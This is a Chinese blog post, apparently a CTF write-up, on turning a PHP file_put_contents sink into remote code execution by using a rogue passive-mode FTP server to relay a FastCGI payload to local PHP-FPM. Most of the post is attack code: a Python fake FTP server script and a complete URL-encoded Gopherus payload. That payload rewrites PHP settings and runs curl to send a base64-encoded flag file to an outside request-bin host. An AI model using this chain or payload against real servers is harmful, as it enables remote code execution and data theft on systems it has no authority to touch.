<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="参考链接：https:&#x2F;&#x2F;tttang.com&#x2F;archive&#x2F;1775&#x2F;#toc__3 https:&#x2F;&#x2F;blog.csdn.net&#x2F;miuzzx&#x2F;article&#x2F;details&#x2F;124038567 FTP的被动模式：客户机连接FTP服务器，FTP指定一个端口，在这个端口上进行数据传输。假如我们指定 (127,0,0,1,0,9000) ，那么便可以将地址和端口指到  127.0.0.1:9000">
<meta property="og:type" content="article">
<meta property="og:title" content="file_put_contens打ftp转php-fpm">
<meta property="og:url" content="http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/index.html">
<meta property="og:site_name" content="K1ato&#39;s blog">
<meta property="og:description" content="参考链接：https:&#x2F;&#x2F;tttang.com&#x2F;archive&#x2F;1775&#x2F;#toc__3 https:&#x2F;&#x2F;blog.csdn.net&#x2F;miuzzx&#x2F;article&#x2F;details&#x2F;124038567 FTP的被动模式：客户机连接FTP服务器，FTP指定一个端口，在这个端口上进行数据传输。假如我们指定 (127,0,0,1,0,9000) ，那么便可以将地址和端口指到  127.0.0.1:9000">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/1.PNG">
<meta property="article:published_time" content="2024-09-15T14:23:16.000Z">
<meta property="article:modified_time" content="2024-09-16T03:18:32.531Z">
<meta property="article:author" content="k1ato">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/1.PNG">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>file_put_contens打ftp转php-fpm</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/09/15/Gopher%E6%89%93PHP-FPM%E6%9C%AA%E6%8E%88%E6%9D%83/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&text=file_put_contens打ftp转php-fpm"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&title=file_put_contens打ftp转php-fpm"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&is_video=false&description=file_put_contens打ftp转php-fpm"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=file_put_contens打ftp转php-fpm&body=Check out this article: http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&title=file_put_contens打ftp转php-fpm"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&title=file_put_contens打ftp转php-fpm"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&title=file_put_contens打ftp转php-fpm"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&title=file_put_contens打ftp转php-fpm"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&name=file_put_contens打ftp转php-fpm&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&t=file_put_contens打ftp转php-fpm"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">参考链接：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#FTP%E7%9A%84%E8%A2%AB%E5%8A%A8%E6%A8%A1%E5%BC%8F%EF%BC%9A"><span class="toc-number">2.</span> <span class="toc-text">FTP的被动模式：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BA%90%E7%A0%81%EF%BC%9A"><span class="toc-number">3.</span> <span class="toc-text">源码：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B%EF%BC%9A"><span class="toc-number">4.</span> <span class="toc-text">攻击流程：</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        file_put_contens打ftp转php-fpm
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">k1ato</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-09-15T14:23:16.000Z" class="dt-published" itemprop="datePublished">2024-09-15</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h3 id="参考链接："><a href="#参考链接：" class="headerlink" title="参考链接："></a>参考链接：</h3><p><a target="_blank" rel="noopener" href="https://tttang.com/archive/1775/#toc__3">https://tttang.com/archive/1775/#toc__3</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/miuzzx/article/details/124038567">https://blog.csdn.net/miuzzx/article/details/124038567</a></p>
<h3 id="FTP的被动模式："><a href="#FTP的被动模式：" class="headerlink" title="FTP的被动模式："></a>FTP的被动模式：</h3><p>客户机连接FTP服务器，FTP指定一个端口，在这个端口上进行数据传输。假如我们指定 <code>(127,0,0,1,0,9000)</code> ，那么便可以将地址和端口指到  127.0.0.1:9000，也就是本地的9000端口。同时由于FTP的特性，其会把传输的数据原封不动的发给本地的9000端口，不会有任何的多余内容。如果将传输的数据换为特定的Payload数据，那么便可以攻击内网特定端口上的应用了。<code>在这整个过程中，FTP只起到了一个重定向Payload内容的作用。</code></p>
<h3 id="源码："><a href="#源码：" class="headerlink" title="源码："></a>源码：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$file = $_GET[&#x27;file&#x27;];</span><br><span class="line">$content = $_GET[&#x27;content&#x27;];</span><br><span class="line"></span><br><span class="line">file_put_contents($file, $content);</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h3 id="攻击流程："><a href="#攻击流程：" class="headerlink" title="攻击流程："></a>攻击流程：</h3><p>1.vps上用python起一个ftp服务器（被动模式）</p>
<p>运行python ftp.py</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">import socket</span><br><span class="line">s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) </span><br><span class="line">s.bind((&#x27;0.0.0.0&#x27;, 21))        # ftp服务绑定23号端口</span><br><span class="line">s.listen(1)</span><br><span class="line">conn, addr = s.accept()</span><br><span class="line">conn.send(b&#x27;220 welcome\n&#x27;)</span><br><span class="line">#Service ready for new user.</span><br><span class="line">#Client send anonymous username</span><br><span class="line">#USER anonymous</span><br><span class="line">conn.send(b&#x27;331 Please specify the password.\n&#x27;)</span><br><span class="line">#User name okay, need password.</span><br><span class="line">#Client send anonymous password.</span><br><span class="line">#PASS anonymous</span><br><span class="line">conn.send(b&#x27;230 Login successful.\n&#x27;)</span><br><span class="line">#User logged in, proceed. Logged out if appropriate.</span><br><span class="line">#TYPE I</span><br><span class="line">conn.send(b&#x27;200 Switching to Binary mode.\n&#x27;)</span><br><span class="line">#Size /</span><br><span class="line">conn.send(b&#x27;550 Could not get the file size.\n&#x27;)</span><br><span class="line">#EPSV (1)</span><br><span class="line">conn.send(b&#x27;150 ok\n&#x27;)</span><br><span class="line">#PASV</span><br><span class="line">conn.send(b&#x27;227 Entering Extended Passive Mode (127,0,0,1,0,9000)\n&#x27;) #STOR / (2) </span><br><span class="line"># &quot;127,0,0,1&quot;PHP-FPM服务为受害者本地，&quot;9000&quot;为为PHP-FPM服务的端口号</span><br><span class="line">conn.send(b&#x27;150 Permission denied.\n&#x27;)</span><br><span class="line">#QUIT</span><br><span class="line">conn.send(b&#x27;221 Goodbye.\n&#x27;)</span><br><span class="line">conn.close()</span><br></pre></td></tr></table></figure>

<p>以上脚本在有客户端连接一次后就会停止，再用还要再运行脚本。</p>
<p>2.用Gopherus生成payload</p>
<img src="/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/1.PNG" class="">



<p>3.传参进行RCE</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=ftp://aaa@49.232.253.171:21/123&amp;content=%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F7%07%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH115%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00s%04%00%3C%3Fphp%20system%28%27curl%20http%3A//requestbin.cn%3A80/zax1ttza/%3Fa%3D%60cat%20/flagfile%7Cbase64%60%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00</span><br></pre></td></tr></table></figure>

<p>只取_后的内容且不用再url编码。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">参考链接：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#FTP%E7%9A%84%E8%A2%AB%E5%8A%A8%E6%A8%A1%E5%BC%8F%EF%BC%9A"><span class="toc-number">2.</span> <span class="toc-text">FTP的被动模式：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BA%90%E7%A0%81%EF%BC%9A"><span class="toc-number">3.</span> <span class="toc-text">源码：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B%EF%BC%9A"><span class="toc-number">4.</span> <span class="toc-text">攻击流程：</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&text=file_put_contens打ftp转php-fpm"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&title=file_put_contens打ftp转php-fpm"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&is_video=false&description=file_put_contens打ftp转php-fpm"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=file_put_contens打ftp转php-fpm&body=Check out this article: http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&title=file_put_contens打ftp转php-fpm"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&title=file_put_contens打ftp转php-fpm"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&title=file_put_contens打ftp转php-fpm"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&title=file_put_contens打ftp转php-fpm"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&name=file_put_contens打ftp转php-fpm&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/&t=file_put_contens打ftp转php-fpm"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2024
    k1ato
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
